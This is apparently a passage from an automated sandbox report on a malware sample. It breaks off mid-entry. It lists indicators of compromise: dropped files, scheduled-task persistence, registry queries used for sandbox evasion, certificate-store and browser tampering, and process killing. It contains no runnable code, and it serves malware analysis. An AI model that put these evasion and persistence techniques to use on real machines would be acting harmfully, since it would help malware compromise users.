autosubplayer.exeschtasks.exemsiexec.exewDmspnJ.exeultramediaburner.tmpabLzenc.exedata_load.exe98zXQtfds9_B8K1wkYwThy5h.exejRMIx4HYZwNMhmRfA3bxVT31.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libssp-0.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW schtasks.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm schtasks.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\XIeUzOL.xml wDmspnJ.exe File created C:\Program Files (x86)\iOPoQDDXUfpqC\ItkKAnP.dll wDmspnJ.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\qUmvKit.xml abLzenc.exe File created C:\Program Files (x86)\iOPoQDDXUfpqC\WktMODE.xml abLzenc.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wDmspnJ.exe File created C:\Program Files (x86)\iOPoQDDXUfpqC\FrwjkHz.xml wDmspnJ.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\ autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\fSairMrhYOPU2\uvrUIbH.xml abLzenc.exe File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\oZVOHfyaZMUn\cUqfxSW.dll wDmspnJ.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak 98zXQtfds9_B8K1wkYwThy5h.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files\temp_files\bckf.fon data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe jRMIx4HYZwNMhmRfA3bxVT31.exe File created C:\Program Files (x86)\fSairMrhYOPU2\cYMkdvQsmFqnU.dll abLzenc.exe File created C:\Program Files (x86)\lighteningplayer\uninstall.exe autosubplayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm schtasks.exe File created C:\Program Files (x86)\temp_files autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll autosubplayer.exe -
Drops file in Windows directory 55 IoCs
Processes:
schtasks.exemsiexec.exesvchost.exeschtasks.exeMicrosoftEdge.exeschtasks.exeschtasks.exeWMIC.exeWMIC.exeschtasks.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeDyzW75Vg9OFYpumqyTL2gvjP.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job schtasks.exe File opened for modification C:\Windows\Installer\MSI6590.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job svchost.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI9E83.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\39a31.msi msiexec.exe File opened for modification C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job schtasks.exe File created C:\Windows\Installer\39a2e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA5B8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAA6E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC8F7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2ECD.tmp msiexec.exe File opened for modification C:\Windows\Tasks\fHOlMGNmDutpzGekG.job svchost.exe File opened for modification C:\Windows\Installer\MSIC7EC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8A6E.tmp msiexec.exe File opened for modification C:\Windows\Tasks\PvKMXtxeDKBRRtMew.job svchost.exe File opened for modification C:\Windows\Installer\MSICA12.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB0B9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1E51.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Tasks\JnrJAucJILlcMMe.job schtasks.exe File opened for modification C:\Windows\Tasks\fHOlMGNmDutpzGekG.job schtasks.exe File created C:\Windows\Tasks\PvKMXtxeDKBRRtMew.job WMIC.exe File opened for modification C:\Windows\Tasks\JnrJAucJILlcMMe.job svchost.exe File opened for modification C:\Windows\Installer\MSIADCA.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI4813.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT WMIC.exe File opened for modification C:\Windows\Installer\MSI5A25.tmp msiexec.exe File created C:\Windows\Tasks\JnrJAucJILlcMMe.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIA8D7.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIDA26.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA701.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSICB7B.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp DyzW75Vg9OFYpumqyTL2gvjP.exe File opened for modification C:\Windows\Installer\MSICB3C.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri WMIC.exe File opened for modification C:\Windows\Installer\MSIC899.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE917.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\39a2e.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\fHOlMGNmDutpzGekG.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4584 4916 WerFault.exe 2.exe 2804 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 3280 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 4784 4968 WerFault.exe setup.exe 1016 3788 WerFault.exe Sun19eb40faaaa9.exe 1260 4968 WerFault.exe setup.exe 1588 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 1588 4968 WerFault.exe setup.exe 4684 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 5304 4968 WerFault.exe setup.exe 5536 4968 WerFault.exe setup.exe 5696 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 5736 4968 WerFault.exe setup.exe 5832 4968 WerFault.exe setup.exe 5324 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 5772 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 5916 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 1892 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe 5816 1564 WerFault.exe Sun19de8ff4b6aefeb8.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Install.exewcbafrfQSydSxCGLaGDRZ1oU1LJVgeo.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Install.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wcbafrf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wcbafrf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wcbafrf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
cmd.exesvchost.exeEnaxl.exefirefox.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Enaxl.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe -
Creates scheduled task(s) 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 8588 schtasks.exe 2916 schtasks.exe 8672 schtasks.exe 5192 schtasks.exe 2204 schtasks.exe 8984 schtasks.exe 4532 schtasks.exe 7852 schtasks.exe 7544 schtasks.exe 9088 schtasks.exe 5236 schtasks.exe 1892 schtasks.exe 6876 schtasks.exe 8932 schtasks.exe 408 schtasks.exe 6040 schtasks.exe 5012 schtasks.exe 7788 schtasks.exe 7456 schtasks.exe 7036 schtasks.exe 7416 schtasks.exe 7416 schtasks.exe 8612 schtasks.exe 8764 schtasks.exe 5192 schtasks.exe 6416 schtasks.exe 1340 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 4676 timeout.exe 5356 timeout.exe 4492 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
Install.exeInstall.exechrome.exechrome.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4536 taskkill.exe 7272 taskkill.exe 1592 taskkill.exe 3288 taskkill.exe 3796 taskkill.exe 6404 taskkill.exe 8264 taskkill.exe 8928 taskkill.exe 6524 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
WMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Colors WMIC.exe -
Processes:
WMIC.exeMicrosoftEdgeCP.exeIqRhcst.exehjKQMrj.exebrowser_broker.exeschtasks.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IqRhcst.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IqRhcst.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch hjKQMrj.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main schtasks.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" hjKQMrj.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewDmspnJ.exepowershell.exereg.exesvchost.exeforfiles.exeschtasks.exeschtasks.exegpscript.exepowershell.exeabLzenc.exepowershell.exeeCiNxbZ.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wDmspnJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer forfiles.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates gpscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople gpscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs schtasks.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft abLzenc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\UserChoice\ProgId = "AppX43hnxtbyyps62jhe9sqpdzxn1790zetc" abLzenc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eCiNxbZ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" eCiNxbZ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 64 IoCs
Processes:
WMIC.exemsiexec.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exerundll32.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache WMIC.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "338469730" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set 